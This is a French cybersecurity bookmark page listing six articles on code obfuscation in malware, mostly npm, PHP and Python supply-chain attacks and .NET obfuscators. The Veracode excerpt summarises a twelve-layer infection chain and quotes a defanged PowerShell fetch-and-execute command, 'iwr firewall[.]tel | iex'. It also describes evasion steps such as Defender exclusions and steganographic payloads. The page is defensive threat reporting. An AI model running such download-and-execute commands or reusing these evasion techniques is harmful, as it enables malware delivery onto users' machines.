Cyberveillecurated by Decio
Nuage de tags
Mur d'images
Quotidien
Flux RSS
  • Flux RSS
  • Daily Feed
  • Weekly Feed
  • Monthly Feed
Filtres

Liens par page

  • 20 links
  • 50 links
  • 100 links

Filtres

Untagged links
6 résultats taggé obfuscation  ✕
Down the Rabbit Hole of Unicode Obfuscation https://www.veracode.com/blog/down-the-rabbit-hole-of-unicode-obfuscation/
11/06/2025 16:36:34
QRCode
archive.org
thumbnail

Hidden under layers of obfuscation, an npm package delivers a remote access tool. Application Security for the AI Era
In the ever-vigilant effort to secure the open-source ecosystem, Veracode’s continuous monitoring systems recently flagged a pair of npm malware packages—solders and @mediawave/lib. The malicious behavior, however, is not at all obvious at first because of a layer of unusual Unicode obfuscation that caught our attention. Our investigation focused on the solders package, which leverages a common yet critical attack vector: a postinstall script in its package.json. This hook means that simply installing the package is enough to trigger its hidden malicious payload.

Upon inspection, the target lib.js file presented itself not as typical code, but as a dizzying wall of Unicode characters, predominantly Japanese Katakana and Hiragana. This was far more than simple character substitution; it was the entry point to an extremely layered and complex malicious attack chain. What began as an analysis of a single, clever JavaScript obfuscation technique quickly spiraled into a deep-dive that traversed multiple programming languages, downloader stages, and even steganography. Join us as we peel back each layer of this remarkably elaborate attack, following the trail from a few cryptic symbols all the way down to its final RAT payload.

TL;DR
If you’re just here for the highlights and want to see the full, multi-layered attack chain in a concise format, please scroll down to the “Recap: The Anatomy of a Multi-Layered Attack” section. There, we detail each of the twelve layers we had to unravel to get to the bottom of this threat.

This investigation revealed a remarkably deep and complex attack chain. To fully appreciate the attacker’s efforts to evade detection, here is a step-by-step summary of the layers we unraveled:

Layer 1: NPM postinstall Hook: The attack begins with a standard postinstall script in the package.json file, automatically executing the malware upon installation.
Layer 2: Unicode Obfuscated JavaScript: The initial lib.js payload is obfuscated using Japanese Hiragana and Katakana characters as variable names, making static analysis nearly impossible at a glance.
Layer 3: Dynamically Reconstructed JavaScript: This Unicode script is not a direct payload, but a program designed to dynamically build primitives (e.g., ‘t’, ‘r’, ‘u’, ‘e’) and reconstruct the Function constructor from scratch.
Layer 4: Second-Stage Obfuscated JavaScript: The Unicode layer dynamically assembles and executes a second, more traditionally obfuscated JavaScript payload that uses array shuffling and hex encoding.
Layer 5: PowerShell Downloader: Once deobfuscated, the JavaScript’s sole purpose is to execute a short PowerShell command (iwr firewall[.]tel | iex) to download and execute the next stage from a remote server.
Layer 6: Binary-Encoded PowerShell Script: The script hosted at firewall[.]tel is itself obfuscated, with the payload encoded as arrays of binary strings that are converted to ASCII characters and executed.
Layer 7: Base64-Encoded PowerShell Script: Deobfuscating the binary strings reveals another PowerShell script. This one uses Base64 encoding to hide its commands which include adding Windows Defender exclusions and downloading a malicious batch file.
Layer 8: Obfuscated Batch File: The downloaded output.bat (nearly 1MB in size) uses extensive obfuscation, setting hundreds of random environment variables and then concatenating them in a specific order.
Layer 9: Encrypted & Compressed .NET DLL: The batch script’s true payload is a Base64-encoded, 3DES-encrypted, and Gzip-compressed .NET DLL, which is reconstructed and loaded directly into memory.
Layer 10: Steganography: This first .NET DLL is not the final payload. It reaches out to a 3MB PNG image file hosted online and uses steganography techniques to extract hidden data from the image.
Layer 11: Second .NET DLL (The RAT): The data extracted from the image is used to build a second .NET DLL in memory.
Layer 12: Final Payload Deployment: This final DLL is the Pulsar RAT, a remote administration tool that gives the attacker full control over the victim’s machine.

veracode EN 2025 Unicode Obfuscation
PHP Obfuscator with Backdoor https://www.andreadraghetti.it/php-obfuscator-with-backdoor/
30/03/2024 14:01:19
QRCode
archive.org
thumbnail

An online tool offers a service to obfuscate PHP code, but it also silently inserts a backdoor into the code that allows any other PHP code to be executed!

andreadraghetti EN 2024 php obfuscation backdoor online
Python obfuscation traps https://checkmarx.com/blog/python-obfuscation-traps/
08/11/2023 18:39:45
QRCode
archive.org
thumbnail

In the realm of software development, open-source tools and packages play a pivotal role in simplifying tasks and accelerating development processes. Yet, as the community grows, so does the number of bad actors looking to exploit it. A recent example involves developers being targeted by seemingly legitimate Python obfuscation packages that harbor malicious code.

checkmarx EN 2023 Python obfuscation Supply-chain-attack
Don't @ Me: URL Obfuscation Through Schema Abuse https://www.mandiant.com/resources/blog/url-obfuscation-schema-abuse
23/05/2023 21:41:16
QRCode
archive.org
thumbnail

Attackers are distributing malware using a technique that abuses the URL schema.

mandiant EN 2023 Obfuscation URL Schema Smokeloader
Raspberry Robin Malware Targets Telecom, Governments https://www.trendmicro.com/en_us/research/22/l/raspberry-robin-malware-targets-telecom-governments.html
26/12/2022 23:06:07
QRCode
archive.org
thumbnail

We found samples of the Raspberry Robin malware spreading in telecommunications and government office systems beginning September. The main payload itself is packed with more than 10 layers for obfuscation and is capable of delivering a fake payload once it detects sandboxing and security analytics tools.

trendmicro EN 2022 malware apt endpoints RaspberryRobin obfuscation analysis
Unflattening ConfuserEx .NET Code in IDA https://www.govcert.ch/blog/unflattening-confuserex-code-in-ida/
20/09/2022 00:01:22
QRCode
archive.org

we’re studying the ConfuserEx1 obfuscation mechanism of a Ginzo .NET sample. This class of obfuscator is known as code flatteners. We describe how it can dealt with it using a Python script within IDA Pro2, a famous reverse-engineering tool.

GovCERT EN 2022 CH NCSC ConfuserEx1 ConfuserEx obfuscation IDA reverse-engineering
4481 links
Shaarli - The personal, minimalist, super-fast, database free, bookmarking service par la communauté Shaarli - Theme by kalvn - Curated by Decio